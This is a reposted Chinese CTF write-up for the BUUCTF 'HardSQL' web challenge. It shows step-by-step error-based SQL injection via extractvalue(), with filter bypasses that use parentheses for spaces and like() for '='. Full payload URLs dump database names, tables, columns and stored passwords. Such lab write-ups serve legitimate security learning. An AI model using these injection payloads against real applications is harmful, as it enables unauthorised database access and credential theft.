极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL
生活随笔
收集整理的這篇文章主要介紹了
极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL
小編覺得挺不錯的,現在分享給大家,幫大家做個參考.
CTF-Web-[極客大挑戰 2019]HardSQL
博客說明
文章所涉及的資料來自互聯網整理和個人總結,意在于個人學習和經驗匯總,如有什么地方侵權,請聯系本人刪除,謝謝!本文僅用于學習與交流,不得用于非法用途!
CTP平臺
網址
https://buuoj.cn/challenges
題目
Web類,[極客大挑戰 2019]HardSQL
打開題目的實例
思路
SQl的題目,首先試一試萬能密碼
試一下雙寫
看來被封死了,想想其他的辦法,可以使用extractvalue和updatexml進行報錯注入,空格和=號沒有,所以我們要使用()來代替空格,使用like來代替=號
使用extractvalue()
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(database()))))%23這一下報錯把數據庫名給爆出來了
爆表 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where((table_schema)like('geek')))))%23 爆字段 /check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where((table_name)like('H4rDsq1')))))%23 爆數據把password查出來
/check.php?username=admin&password=admin'^extractvalue(1,concat(0x7e,(select(password)from(geek.H4rDsq1))))%23flag出來了,不對好像只有一半,使用{left(),right()}
/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(left(password,30))from(geek.H4rDsq1))))%23/check.php?username=admin&password=admin%27^extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1))))%23拼接起來就是flag了
感謝
BUUCTF
以及勤勞的自己
總結
以上是生活随笔為你收集整理的极客大挑战2020_CTF-Web-[极客大挑战 2019]HardSQL的全部內容,希望文章能夠幫你解決所遇到的問題。
- 上一篇: 前端如何实现音乐盒胶盘的转动_郑州Web
- 下一篇: python库下载安装报错_python